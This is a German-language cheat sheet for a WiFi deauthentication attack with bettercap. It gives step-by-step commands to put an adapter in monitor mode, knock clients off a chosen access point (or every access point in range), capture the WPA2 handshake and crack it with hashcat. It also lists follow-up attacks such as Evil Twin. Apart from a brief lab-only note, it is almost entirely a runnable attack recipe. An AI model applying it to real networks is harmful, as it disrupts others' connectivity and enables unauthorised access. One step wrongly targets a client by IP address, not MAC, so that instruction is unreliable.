WiFi Deauth mit bettercap

Eine WiFi Deauthentication Attacke trennt Clients von ihrem Access Point. bettercap sendet gefälschte Deauth-Pakete im Namen des APs. Nebeneffekt: Beim erneuten Verbinden kann der WPA2-Handshake mitgeschnitten werden.

Umgebung

KALI     = Angreifer (WLAN-Adapter mit Monitor-Modus)
ZIEL-AP  = 78:8c:b5:2a:5b:b4  (MAC des Access Points)
OPFER    = 192.168.16.131      (optional - gezielter Angriff)

Voraussetzung

WLAN-Adapter muss Monitor-Modus unterstützen

iwconfig

Monitor-Modus aktivieren

sudo ip link set wlan0 down
sudo iwconfig wlan0 mode monitor
sudo ip link set wlan0 up

Prüfen

iwconfig wlan0
wlan0   Mode:Monitor ...

Angreifer - bettercap starten

sudo bettercap -iface wlan0

In der bettercap-Konsole

WiFi Reconnaissance starten

wifi.recon on

Access Points anzeigen

wifi.show

Nur einen bestimmten Kanal scannen

wifi.recon.channel 6

Handshake-Datei festlegen

set wifi.handshakes.file ./handshake.pcap

Deauth Angriff

Alle Clients eines APs deauthentifizieren

wifi.deauth 78:8c:b5:2a:5b:b4

Einzelnen Client deauthentifizieren

wifi.deauth 192.168.16.131

Alle APs in Reichweite (nicht empfohlen)

wifi.deauth ff:ff:ff:ff:ff:ff

Handshake mitschneiden

Nach dem Deauth verbindet sich der Client erneut

bettercap speichert den WPA2-Handshake automatisch

ls -la ./handshake.pcap

Handshake mit hashcat cracken

hashcat -m 22000 handshake.pcap wordlist.txt

Optionen wifi

Hilfe anzeigen

help wifi

• wifi.handshakes.file → Speicherort für Handshakes (default=)
• wifi.recon.channel → Kanal einschränken
• wifi.skip.broken → Beschädigte Pakete überspringen

Hinweis

• Nur im eigenen Labor oder mit ausdrücklicher Genehmigung
• Monitor-Modus wird nicht von allen WLAN-Adaptern unterstützt
• Empfohlene Adapter für Kali: Alfa AWUS036ACH, Alfa AWUS036NH
• In VirtualBox: USB WLAN-Adapter durchreichen

Mögliche Folgeangriffe

• WPA2 Handshake cracken mit hashcat
• Evil Twin Attacke
• PMKID Attacke

Siehe auch

• bettercap
• ARP Spoofing mit bettercap